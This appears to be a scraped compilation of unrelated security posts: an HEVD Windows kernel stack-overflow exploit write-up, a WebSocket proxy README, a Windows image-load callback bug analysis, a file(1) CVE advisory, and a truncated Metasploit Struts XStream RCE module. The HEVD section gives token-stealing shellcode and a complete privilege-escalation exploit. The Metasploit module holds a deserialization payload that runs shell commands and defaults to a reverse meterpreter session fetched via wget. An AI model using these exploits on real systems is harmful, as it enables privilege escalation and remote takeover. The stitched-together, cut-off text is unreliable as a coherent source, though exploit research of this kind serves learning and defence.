Contact: PROJECT INSECURITY
That’s all for now. I’m open to constructive criticism but this is my first blog post so don’t be too mean about my terrible writing style or any errors I made. The quality of my writing will improve in future posts. I hope someone at least learned something from this — MLT
Source: https://medium.com/@insecurity_92477/utilizing-htaccess-for-exploitation-purposes-part-1-5733dd7fc8eb
-
Contents:
- Understanding the Risk
- Communication
  - Transport Layer Security (TLS)
  - Certificate Pinning
- Data Storage
- Binary Protections
  - Obfuscation
  - Root/Jailbreak Detection
  - Debug Protection
  - Hook Detection
  - Runtime Integrity Checks
- Attacker Effort
- Grading Applications
Download: http://file.digitalinterruption.com/Secure Mobile Development.pdf
-
HEVD Stack Overflow GS
Posted on September 5, 2017
Lately, I've decided to play around with HackSys Extreme Vulnerable Driver (HEVD) for fun. It's a great way to familiarize yourself with Windows exploitation. In this blog post, I'll show how to exploit the stack overflow that is protected with /GS stack cookies on Windows 7 SP1 32 bit. You can find the source code here. It has a few more exploits written and a Win10 pre-anniversary version of the regular stack buffer overflow vulnerability.
Triggering the Vulnerable Function
To start, we need to find the ioctl dispatch routine in HEVD. Looking for the IRP_MJ_DEVICE_CONTROL IRP, we see that the dispatch function can be found at hevd+508e.
kd> !drvobj hevd 2
Driver object (852b77f0) is for:
 \Driver\HEVD
DriverEntry:   995cb129  HEVD
DriverStartIo: 00000000
DriverUnload:  995ca016  HEVD
AddDevice:     00000000

Dispatch routines:
[00] IRP_MJ_CREATE                      995c9ff2  HEVD+0x4ff2
[01] IRP_MJ_CREATE_NAMED_PIPE           995ca064  HEVD+0x5064
...
[0e] IRP_MJ_DEVICE_CONTROL              995ca08e  HEVD+0x508e
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL     995ca064  HEVD+0x5064
[10] IRP_MJ_SHUTDOWN                    995ca064  HEVD+0x5064
[11] IRP_MJ_LOCK_CONTROL                995ca064  HEVD+0x5064
[12] IRP_MJ_CLEANUP                     995ca064  HEVD+0x5064
[13] IRP_MJ_CREATE_MAILSLOT             995ca064  HEVD+0x5064
[14] IRP_MJ_QUERY_SECURITY              995ca064  HEVD+0x5064
[15] IRP_MJ_SET_SECURITY                995ca064  HEVD+0x5064
...
Finding the ioctl request number requires very light reverse engineering. We want to end up eventually at hevd+515a. At hevd+50b4, 222003h is subtracted from the request number. If the result is 0 (i.e. the request was 222003h), execution jumps to hevd+5172; otherwise it falls through to hevd+50bf. In this basic block, the value is reduced by a further 4. If the result is 0, we are where we want to be. Therefore, our ioctl number should be 222007h.
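The two subtractions can be modeled in a few lines of Python to double-check the request number (the branch labels mirror the disassembly described above; the model itself is my own):

```python
def dispatch(ioctl):
    # hevd+50b4: subtract 0x222003 from the request number
    x = ioctl - 0x222003
    if x == 0:
        return 'hevd+5172'          # taken when the request was 0x222003
    # hevd+50bf: subtract 4 more
    x -= 4
    if x == 0:
        return 'stack_overflow_gs'  # the vulnerable handler we want
    return 'other'
```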
Eventually, a memcpy is reached where the calling function does not check the copy size.
To give the overflow code a quick run, we call it with benign input using the code below. You can find the implementation of mmap and write in the full source code.
def trigger_stackoverflow_gs(addr, size):
    dwReturn = c_ulong()
    driver_handle = kernel32.CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                                         0, None, OPEN_EXISTING, 0, None)
    if not driver_handle or driver_handle == -1:
        sys.exit()
    print "[+] IOCTL: 0x222007"
    dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222007, addr, size,
                                         None, 0, byref(dwReturn), None)

m = mmap()
write(m, 'A'*10)
trigger_stackoverflow_gs(m, 10)
In WinDbg, the debug output confirms that we are calling the right ioctl.
From the figure, we can see that the kernel buffer is 0x200 bytes in size, so if we run the PoC again with 0x250 As, we should overflow the stack cookie and blue screen our VM.
Indeed, the bugcheck tells us that the system crashed due to a stack buffer overflow. Stack cookies in Windows are first XORed with ebp before they're stored on the stack. If we take the cookie in the bugcheck, and XOR it with 41414141, the result should resemble a stack address. Specifically, it should be the stack base pointer for hevd+48da.
kd> ? e9d25b91 ^ 41414141 Evaluate expression: -1466754352 = a8931ad0
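The same arithmetic in Python, as a quick cross-check of the cookie/ebp relationship described above:

```python
leaked_cookie = 0xe9d25b91  # cookie value from the bugcheck
padding_dword = 0x41414141  # our 'A' overwrite
ebp = leaked_cookie ^ padding_dword
assert hex(ebp) == '0xa8931ad0'  # a plausible stack address, as expected
```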
Bypassing Stack Cookies
A common way to bypass stack cookies, introduced by David Litchfield, is to cause the program to throw an exception before the stack cookie is checked at the end of the function. This works because when an exception occurs, the stack cookie is not checked.
There are two ways [generating an exception] might happen--one we can control and the other is dependent of the code of the vulnerable function. In the latter case, if we overflow other data, for example parameters that were pushed onto the stack to the vulnerable function and these are referenced before the cookie check is performed then we could cause an exception here by setting this data to something that will cause an exception. If the code of the vulnerable function has been written in such a way that no opportunity exists to do this, then we have to attempt to generate our own exception. We can do this by attempting to write beyond the end of the stack.
For us, it's easy because the vulnerable function uses memcpy. We can simply force memcpy to segfault by letting it continue copying the source buffer all the way to unmapped memory.
I use my mmap function to map two adjacent pages, then munmap to unmap the second page. mmap and munmap are just simple wrappers I wrote for NtAllocateVirtualMemory and NtFreeVirtualMemory respectively. The idea is to place the source buffer at the end of the page that remains mapped, and have the vulnerable memcpy read off into the unmapped page to cause an exception.
To test this, we'll use the PoC code below.
m = mmap(size=0x2000)
munmap(m+0x1000)
trigger_stackoverflow_gs(m+0x1000-0x250, 0x251)
Back in the debugger, we can observe that an exception was thrown and eip was overwritten as a result of the exception handler being overwritten.
The next step is to find the offset of the As so we can control eip to point to shellcode. You can use a binary-search-type approach to find the offset, but an easier method is to use a De Bruijn sequence as the payload. I usually use Metasploit's pattern_create.rb and pattern_offset.rb for finding the exact offset in my buffer.
The figure above shows that 41367241 overwrites the exception handler address, and therefore also eip.
kd> .formats 41367241 Evaluate expression: Hex: 41367241 Decimal: 1094087233 Octal: 10115471101 Binary: 01000001 00110110 01110010 01000001 Chars: A6rA Time: Wed Sep 1 18:07:13 2004 Float: low 11.4029 high 0 Double: 5.40551e-315
Reversing the order due to endianness, we get Ar6A which pattern_offset.rb tells us is offset 528 (0x210). Therefore, our source buffer will be of size 0x210+4, where the 4 is due to the address of our shellcode.
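If Metasploit is not at hand, both steps (building the cyclic pattern and looking up the offset, including the endianness swap) can be reproduced in Python. This is a re-implementation of the pattern_create/pattern_offset idea, not the original Ruby scripts:

```python
import string
import struct

def pattern_create(length):
    # Cyclic pattern of Upper/lower/digit triples: Aa0Aa1Aa2...Ab0...
    out = []
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out.append(a + b + c)
                if len(out) * 3 >= length:
                    return ''.join(out)[:length]
    return ''.join(out)[:length]

def pattern_offset(needle, length=8192):
    # First position of the crash value inside the pattern
    return pattern_create(length).find(needle)

# 0x41367241 read back in memory order gives 'Ar6A' due to little-endianness
eip_bytes = struct.pack('<I', 0x41367241).decode()
offset = pattern_offset(eip_bytes)  # 528 == 0x210, matching the write-up
```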
Constructing Shellcode
Since there is 0x1000-0x210-4 unused space in our allocated page, we can just put our shellcode in the beginning of the page. I use common Windows token stealing shellcode that basically iterates through the _EPROCESSs, looks for the SYSTEM process, and copies the SYSTEM process' token. Additionally, for convenience in breaking at the shellcode, I prepend the shellcode with a breakpoint (\xcc).
\xcc\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00
Our shellcode still isn't complete yet; the shellcode doesn't know where to return to after it executes. To search for a return address, let's inspect the call stack in the debugger when the shellcode executes.
kd> k
 # ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 a88cf114 82ab3622 0x1540000
01 a88cf138 82ab35f4 nt!ExecuteHandler2+0x26
02 a88cf15c 82ae73b5 nt!ExecuteHandler+0x24
03 a88cf1f0 82af005c nt!RtlDispatchException+0xb6
04 a88cf77c 82a79dd6 nt!KiDispatchException+0x17c
05 a88cf7e4 82a79d8a nt!CommonDispatchException+0x4a
06 a88cf868 995c9969 nt!KiExceptionExit+0x192
07 a88cf86c a88cf8b4 HEVD+0x4969
08 a88cf870 01540dec 0xa88cf8b4
09 a88cf8b4 41414141 0x1540dec
0a a88cf8b8 41414141 0x41414141
0b a88cf8bc 41414141 0x41414141
...
51 a88cfad0 995c99ca 0x41414141
52 a88cfae0 995ca16d HEVD+0x49ca
53 a88cfafc 82a72593 HEVD+0x516d
54 a88cfb14 82c6699f nt!IofCallDriver+0x63
hevd+4969 is the instruction address after the memcpy, but we can't return here because the portion of stack the remaining code uses is corrupted. Fixing the stack to the correct values would be extremely annoying. Instead, returning to hevd+49ca which is the return address of the stack frame right below hevd+4969 makes more sense.
However, if you adjust the stack and return to hevd+49ca, you'll still get a crash. The problem is at hevd+5260 where edi+0x1c is dereferenced. edi at this point is 0 because registers are XORed with themselves before the exception handler assumes control and neither the program nor our shellcode touched edi.
In a normal execution, edi and other registers are restored in __SEH_epilog4. These values are of course restored from the stack. Taking a88cf86c from the stack trace before, we can dump memory and attempt to find the restore values. They are actually quite easy to find here because hevd+5dcc is easy to spot: hevd+5dcc is the address of the debug print string which is restored into ebx.
kd> dds a88cf86c
a88cf86c  995c9969 HEVD+0x4969
a88cf870  a88cf8b4
a88cf874  01540dec
a88cf878  00000218
a88cf87c  995ca760 HEVD+0x5760
a88cf880  995ca31a HEVD+0x531a
a88cf884  00000200
a88cf888  995ca338 HEVD+0x5338
a88cf88c  a88cf8b4
a88cf890  995ca3a2 HEVD+0x53a2
a88cf894  00000218
a88cf898  995ca3be HEVD+0x53be
a88cf89c  01540dec
a88cf8a0  31d15d0b
a88cf8a4  8c843f68   <-- edi
a88cf8a8  8c843fd8   <-- esi
a88cf8ac  995cadcc HEVD+0x5dcc   <-- ebx
a88cf8b0  455f5359
a88cf8b4  41414141
a88cf8b8  41414141
To obtain the offset of edi, just subtract esp from the current address of the restore value.
kd> ? a88cf8a4 - esp
Evaluate expression: 1932 = 0000078c

kd> dds a88cfad0 la
a88cfad0  a88cfae0
a88cfad4  995c99ca HEVD+0x49ca
a88cfad8  01540dec
a88cfadc  00000218
a88cfae0  a88cfafc
a88cfae4  995ca16d HEVD+0x516d
a88cfae8  8c843f68
a88cfaec  8c843fd8
a88cfaf0  86c3c398
a88cfaf4  8586f5f0

kd> ? a88cfad0 - esp
Evaluate expression: 2488 = 000009b8
Similarly, the offset of the location to return to is found by taking the difference of a88cfad0 and esp.
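Both offsets are plain pointer arithmetic. Taking esp as 0xa88cf118 (read off the top frame of the earlier stack trace; an assumption on my part, since the post never prints esp directly), the numbers check out:

```python
esp      = 0xa88cf118  # assumed: top frame of the earlier `kd> k` output
edi_slot = 0xa88cf8a4  # where edi's restore value lives
frame    = 0xa88cfad0  # stack frame below hevd+4969 to return into

assert edi_slot - esp == 0x78c  # -> mov edi, [esp+0x78c]
assert frame - esp == 0x9b8     # -> add esp, 0x9b8 before pop ebp; ret 8
```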
Lastly, our shellcode should end with pop ebp; ret 0x8;, which results in:
start:
    xor eax, eax;
    mov eax, dword ptr fs:[eax+0x124];  # nt!_KPCR.PcrbData.CurrentThread
    mov eax, dword ptr [eax+0x50];      # nt!_KTHREAD.ApcState.Process
    mov ecx, eax;                       # Store unprivileged _EPROCESS in ecx

loop:
    mov eax, dword ptr [eax+0xb8];      # Next nt!_EPROCESS.ActiveProcessLinks.Flink
    sub eax, 0xb8;                      # Back to the beginning of _EPROCESS
    cmp dword ptr [eax+0xb4], 0x04;     # SYSTEM process? nt!_EPROCESS.UniqueProcessId
    jne loop;

stealtoken:
    mov edx, dword ptr [eax+0xf8];      # Get SYSTEM nt!_EPROCESS.Token
    mov dword ptr [ecx+0xf8], edx;      # Copy token

restore:
    mov edi, [esp+0x78c];               # edi irq
    mov esi, [esp+0x790];               # esi
    mov ebx, [esp+0x794];               # move print string into ebx
    add esp, 0x9b8;
    pop ebp;
    ret 0x8;
Gaining NT Authority\SYSTEM
Putting everything together, the final exploit looks like this.
m = mmap(size=0x2000)
munmap(m+0x1000)

size = 0x210+4
sc = '\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x8b\xbc\x24\x8c\x07\x00\x00\x8b\xb4\x24\x90\x07\x00\x00\x8b\x9c\x24\x94\x07\x00\x00\x81\xc4\xb8\x09\x00\x00\x5d\xc2\x08\x00'

write(m, sc + 'A'*(0x1000-4-len(sc)) + struct.pack("<I", m))
trigger_stackoverflow_gs(m+0x1000-size, size+1)

print '\n[+] Privilege Escalated\n'
os.system('cmd.exe')
And that should give us:
-
WSSiP: A WebSocket Manipulation Proxy
Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post.
There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities. See Fuzzing for more details.
Written and maintained by Samantha Chalker (@thekettu). Icon for WSSiP release provided by @dragonfoxing.
Installation
From Packaged Application
See Releases.
From npm/yarn (for CLI commands)
Run the following in your command line:
npm:
# Install Electron globally
npm i -g electron@1.7

# Install wssip global for "wssip" command
npm i -g wssip

# Launch!
wssip
yarn: (Make sure the directory in yarn global bin is in your PATH)
yarn global add electron@1.7
yarn global add wssip
wssip
You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies.
From Source
Using a command line:
# Clone repository locally
git clone https://github.com/nccgroup/wssip

# Change to the directory
cd wssip

# If you are developing for WSSiP:
# npm i

# If not... (as to minimize disk space):
npm i electron@1.7
npm i --production

# Start application:
npm start
Usage
- Open the WSSiP application.
- WSSiP will start listening automatically. This will default to localhost on port 8080.
- Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic.
- Configure the browser to point to http://localhost:8080/ as the HTTP Proxy.
- Navigate to a page using WebSockets. A good example is the WS Echo Demonstration.
- ???
- Potato.
Fuzzing
WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server.
A few of the simple CA certificate downloads are:
- http://mitm/ca.pem / http://mitm/ca.der (Download CA Certificate)
- http://mitm/ca_pri.pem / http://mitm/ca_pri.der (Download Private Key)
- http://mitm/ca_pub.pem / http://mitm/ca_pub.der (Download Public Key)
Get WebSocket Connection Info
Returns whether the WebSocket id is connected to a web server, and if so, return information.
-
URL
-
URL Params
id=[integer]
-
Success Response (Not Connected)
-
Code: 200
Content: {connected: false}
-
Success Response (Connected)
-
Code: 200
Content: {connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13}
-
Send WebSocket Data
Send WebSocket data.
-
URL
-
URL Params
Required:
id=[integer]
sender one of client or server
mode one of message, ping or pong
type one of ascii or binary (text is an alias of ascii)
Optional:
log either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API.
-
Data Params
Raw data in the POST field will be sent to the WebSocket server.
-
Success Response:
-
Code: 200
Content: {success: true}
-
Error Response:
-
Code: 500
Content: {success: false, reason: 'Error message'}
-
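Since the endpoint paths themselves are elided above, here is only the parameter-building half of a fuzzer client, as a hedged Python sketch (the function name and defaults are mine; the parameter names come from the list above):

```python
from urllib.parse import urlencode

def encode_send_params(ws_id, sender='client', mode='message', msg_type='ascii', log=False):
    # Query string for the "Send WebSocket Data" call; the raw frame
    # payload itself travels in the POST body, per the docs above.
    params = {'id': ws_id, 'sender': sender, 'mode': mode, 'type': msg_type}
    if log:
        params['log'] = 'true'
    return urlencode(params)
```

A fuzzer in any language can build the same query string and POST mutated payloads through the bridge.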
Development
Pull requests are welcomed and encouraged. WSSiP supports the debug npm package, and setting the environment variable DEBUG=wssip:* will output debug information to console.
There are two commands depending on how you want to compile the Webpack bundle: for development, that is npm run compile:dev and for production is npm run compile. React will also log errors depending on whether development or production is specified.
Currently working on:
- Exposed API for external scripts for fuzzing (99% complete, it is live but need to test more data)
- Saving/Resuming Connections from File (35% complete, exporting works sans active connections)
- Using WSSiP in browser without Electron (likely 1.1.0)
- Rewrite in TypeScript (likely 1.2.0)
- Using something other than Appbar for Custom/Intercept tabs, and styling the options to center better
For information on using the mitmengine class, see: npm, yarn, or mitmengine/README.md
-
Windows’ PsSetLoadImageNotifyRoutine Callbacks: the Good, the Bad and the Unclear (Part 1)
tl;dr: Security vendors and kernel developers beware – a programming error in the Windows kernel could prevent you from identifying which modules have been loaded at runtime.
Introduction
During research into the Windows kernel, we came across an interesting issue with PsSetLoadImageNotifyRoutine which as its name implies, notifies of module loading.
The thing is, after registering a notification routine for loaded PE images with the kernel the callback may receive invalid image names.
After digging into the matter, what started as a seemingly random issue proved to originate from a coding error in the Windows kernel itself.
This flaw exists in the most recent Windows 10 release and past versions of the OS, dating back to Windows 2000.
The Good: Notification of Module Loading
Say you are a security vendor developing a driver, you would like to be aware of every module the system loads. Hooking? Maybe… but there are many security and implementation deficiencies.
Here’s where Microsoft introduced PsSetLoadImageNotifyRoutine, in Windows 2000. This mechanism, notifies registered drivers, from various parts in the kernel, when a PE image file has been loaded to virtual memory (kernel\user space).
Behind the Scenes:
There are several cases that will cause the notification routine to be invoked:
- Loading drivers
- Starting new processes
- Process executable image
- System DLL: ntdll.dll (2 different binaries for WoW64 processes)
- Runtime loaded PE images – import table, LoadLibrary, LoadLibraryEx[1], NtMapViewOfSection[2]
When invoking the registered notification routines, the kernel provides them with a number of parameters in order to properly identify the PE image that is being loaded. These parameters can be seen in the prototype definition of the callback function:
VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE)(
    _In_opt_ PUNICODE_STRING FullImageName, // The image name
    _In_ HANDLE ProcessId,                  // A handle to the process the PE has been loaded to
    _In_ PIMAGE_INFO ImageInfo              // Information describing the loaded image (base address, size, kernel/user-mode image, etc.)
);
The Only Way to Go
In essence, this is the only documented method in the WDK to actually monitor PEs that are loaded to memory as executable code.
A different method, recommended by Microsoft, is to use a file-system mini-filter callback (IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION). In order to tell that a section object is part of a loaded executable image, one must check for the existence of the SEC_IMAGE flag passed to NtCreateSection. However, the file-system mini-filter callback does not receive this flag, and it is therefore impossible to determine whether the section object is being created for the loading of a PE image or not.
The Bad: Wrong Module Parameter
The only parameter that can effectively identify the loaded PE file is the FullImageName parameter.
However, in each of the scenarios described earlier the kernel uses a different format for FullImageName.
At first glance, we noticed that while we do get the full path of the process executable file, and constant values for the system DLLs (which are missing the volume name), the paths provided for the rest of the dynamically loaded user-mode PEs are also missing the volume name.
What’s more alarming is that not only does that path come without the volume name, sometimes the path is completely malformed, and could point to a different or non-existing file.
RTFM
So as every researcher\developer does, the first thing we did was to go back to the documentation and make sure we understood it properly.
According to MSDN, the description of FullImageName implies it is the path of the file on disk since it “identifies the executable image file”. There is no mention of these invalid or non-existing paths.
The documentation does state that it may be NULL: “(The FullImageName parameter can be NULL in cases in which the operating system is unable to obtain the full name of the image at process creation time.)”. But clearly, if the parameter is not NULL, it means the kernel was able to successfully retrieve the correct image name.
There’s More than Just Typos in the Documentation
Another thing that caught our attention while perusing the documentation was that the function prototype as shown on MSDN is wrong. The Create parameter, which according to its description doesn’t even seem to be related to this mechanism, doesn’t exist in the function prototype from the WDK. Ironically, using the prototype specified on MSDN causes a crash due to stack corruption.
Under the Hood
nt!PsCallImageNotifyRoutines is in charge of invoking the registered callbacks. It merely passes along the UNICODE_STRING pointer it receives from its own caller to the callbacks as the FullImageName parameter. When nt!MiMapViewOfImageSection maps a section as an image this UNICODE_STRING is the FileName field of the FILE_OBJECT represented by that section.
Figure 2: FullImageName passed to the notification routine is actually the FILE_OBJECT’s FileName field.
The FILE_OBJECT is obtained by going through the SECTION -> SEGMENT -> CONTROL_AREA. These are internal and undocumented kernel structures. The Memory Manager creates these structures when mapping a file into memory, and uses these structures internally as long as the file is mapped.
Figure 3: nt!MiMapViewOfImageSection obtaining the FILE_OBJECT before calling nt!PsCallImageNotifyRoutines
There’s a single SEGMENT structure per mapped image. This means that multiple sections of the same image that exists simultaneously, within the same process or across processes, use the same SEGMENT and CONTROL_AREA. This explains why the argument FullImageName was identical when the same PE file as loaded into different processes at the same time.
RTFM Again
In order to understand how the FileName field is set and managed, we went back to the documentation, and according to MSDN using it is forbidden! "[The value] in this string is valid only during the initial processing of an IRP_MJ_CREATE request. This file name should not be considered valid after the file system starts to process the IRP_MJ_CREATE request", yet at this point the FILE_OBJECT is clearly being used long after the file system completed the IRP_MJ_CREATE request.
Now it’s obvious that the NTFS driver takes ownership of this UNICODE_STRING (FILE_OBJECT.FileName).
Using a kernel debugger, we found that ntfs!NtfsUpdateCcbsForLcbMove is the function responsible for the renaming operation. While looking at this function we inferred that during the IRP_MJ_CREATE request the file-system driver simply creates a shallow copy of FILE_OBJECT.FileName and maintains it separately. This means that only the address of the buffer is copied, not the buffer itself.
Root Cause Analysis
As long as the new path length won’t exceed the MaximumLength, the shared buffer will be overwritten without updating the Length field of FILE_OBJECT.FileName, which is where the kernel gets the string for the notification routine. If the new path length exceeds the MaximumLength, a new buffer will be allocated and the notification routine will get a completely outdated value.
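The failure mode is easy to model outside the kernel. The Python toy below treats FileName as a counted string over a fixed buffer and "renames" by overwriting the shared buffer without touching Length, exactly the coding error described above (this is a model of the behavior, not real Windows structures or APIs):

```python
class UnicodeString:
    """Toy model of UNICODE_STRING: a counted string over a fixed buffer."""
    def __init__(self, s, maximum_length):
        raw = s.encode('utf-16-le')
        self.buffer = bytearray(maximum_length)
        self.buffer[:len(raw)] = raw
        self.length = len(raw)              # bytes currently considered valid
        self.maximum_length = maximum_length

    def rename_in_place(self, new_name):
        # Bug model: the file system overwrites the shared buffer
        # but never updates Length on the original structure
        raw = new_name.encode('utf-16-le')
        assert len(raw) <= self.maximum_length
        self.buffer[:len(raw)] = raw

    def value(self):
        return self.buffer[:self.length].decode('utf-16-le')

name = UnicodeString('harmless_library.dll', 64)
name.rename_in_place('evil.dll')
# The notification routine now sees a malformed mixture of new and old:
assert name.value() == 'evil.dll_library.dll'
```

The stale Length causes exactly the kind of mixed, non-existing path the callbacks were observed to receive.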
Even though we finally figured out the cause for this bug something still didn’t add up. Why is it that even after all the handles to the image (from SECTIONs and FILE_OBJECTs) were closed we are still seeing these malformed paths? If all handles to the file were indeed closed, the next time the PE image will be opened and loaded a new FILE_OBJECT should be created without references and with the most up to date path.
Instead, the FullImageName still pointed to the old UNICODE_STRING. This proved that the FILE_OBJECT wasn’t closed although its handle count was 0, which means the reference count must have been higher than 0. We were also able to confirm this using a debugger.
Bottom Line
As a ref count leak in the kernel isn’t very likely we are left with one immediate suspect: The Cache Manager. What seems to be caching behavior, along with the way the file-system driver maintains the file name and a severe coding error is what ultimately causes the invalid name issue.
Pausing to reflect
At this point we were sure we figured out what causes the problem though what eluded us was how can it be that this bug still exists? And there’s no obvious solution for it?
In our next post, we’ll cover our endeavors to find good answers for these questions.
————————————————–
[1] Depending on the dwFlags parameter
[2] Depending on the dwAllocationAttributes of NtCreateSection
Note: majority of the analysis was done on a Windows 7 SP1 x86 fully patched and updated machine.
The findings were also verified to be present on Windows XP SP3, Windows 7 SP1 x64, and Windows 10 Anniversary Update (Redstone), both x86 and x64, all fully patched and updated as well.
-
-
CVE-2017-1000249: file: stack based buffer overflow
From: Thomas Jarosch <thomas.jarosch () intra2net com>
Date: Tue, 05 Sep 2017 18:24:24 +0200

Hello oss security,

file(1) versions 5.29, 5.30 and 5.31 contain a stack based buffer overflow when parsing a specially crafted input file. The issue lets an attacker overwrite a fixed 20 bytes stack buffer with a specially crafted .notes section in an ELF binary file.

There are systems like amavisd-new that automatically run file(1) on every email attachment. To prevent an automated exploit by email, another layer of protection like -fstack-protector is needed.

Upstream fix:
https://github.com/file/file/commit/35c94dc6acc418f1ad7f6241a6680e5327495793

The issue was introduced with this code change in October 2016:
https://github.com/file/file/commit/9611f31313a93aa036389c5f3b15eea53510d4d1

file-5.32 has been released including the fix:
ftp://ftp.astron.com/pub/file/file-5.32.tar.gz
ftp://ftp.astron.com/pub/file/file-5.32.tar.gz.asc

[An official release announcement on the file mailinglist will follow once a temporary outage of the mailinglist is solved]

The cppcheck tool helped to discover the issue:
----
[readelf.c:514]: (warning) Logical disjunction always evaluates to true: descsz >= 4 || descsz <= 20.
----

Credits: The issue has been found by Thomas Jarosch of Intra2net AG. Code fix and new release provided by Christos Zoulas. Fixed packages from distributions should start to be available soon.

Timeline (key entries):
2017-08-26: Notified the maintainer Christos Zoulas
2017-08-27: Christos pushed a fix to CVS / git with innocent looking commit message
2017-08-28: Notified Redhat security team to coordinate release and request CVE ID. Redhat responds it's better to directly contact the distros list instead through them.
2017-09-01: Notified distros mailinglist, asking for CVE ID and requesting embargo until 2017-09-08
2017-09-01: CVE-2017-1000249 ID is assigned
2017-09-04: After discussion that the issue is semi-public already, moved embargo date to 2017-09-05
2017-09-05: Public release

Best regards,
Thomas Jarosch / Intra2net AG
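The cppcheck warning quoted above describes a classic always-true condition. A minimal Python illustration of the logic (not the actual file(1) C code; the real check operates on the ELF note's descsz field before a copy into a 20-byte stack buffer):

```python
# The intended bound was 4 <= descsz <= 20 (the stack buffer is 20 bytes),
# but "or" makes the check pass for EVERY value, so oversized .notes data
# reaches the fixed-size buffer.

def broken_check(descsz):
    # mirrors the flagged C expression: descsz >= 4 || descsz <= 20
    return descsz >= 4 or descsz <= 20

def fixed_check(descsz):
    # a corrected bound that rejects anything larger than the buffer
    return 4 <= descsz <= 20

print(broken_check(64))   # a 64-byte note passes the broken check
print(fixed_check(64))    # and is rejected by the corrected one
```

Because every non-negative value satisfies at least one side of the disjunction, the "validation" never fails, which is exactly what cppcheck flagged.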
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts 2 REST Plugin XStream RCE',
      'Description'    => %q{
        The REST Plugin is using a XStreamHandler with an instance of XStream
        for deserialization without any type filtering and this can lead to
        Remote Code Execution when deserializing XML payloads.
      },
      'Author'         => [
        'Man Yue Mo', # Vuln
        'caiqiiqi',   # PoC
        'wvu'         # Module
      ],
      'References'     => [
        ['CVE', '2017-9805'],
        ['URL', 'https://struts.apache.org/docs/s2-052.html'],
        ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'],
        ['URL', 'http://blog.csdn.net/caiqiiqi/article/details/77861477']
      ],
      'DisclosureDate' => 'Sep 5 2017',
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix', 'linux', 'win'],
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged'     => false,
      'Targets'        => [
        ['Apache Struts 2.5 - 2.5.12', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'PAYLOAD'           => 'linux/x64/meterpreter_reverse_https',
        'CMDSTAGER::FLAVOR' => 'wget'
      },
      'CmdStagerFlavor' => ['wget', 'curl']
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Path to Struts app', '/struts2-rest-showcase/orders/3'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => target_uri.path
    )

    if res && res.code == 200
      CheckCode::Detected
    else
      CheckCode::Safe
    end
  end

  def exploit
    execute_cmdstager
  end

  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method' => 'POST',
      'uri'    => target_uri.path,
      'ctype'  => 'application/xml',
      'data'   => xml_payload(cmd)
    )
  end

  def xml_payload(cmd)
    # xmllint --format
    <<EOF
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>/bin/sh</string><string>-c</string><string>#{cmd}</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer/>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
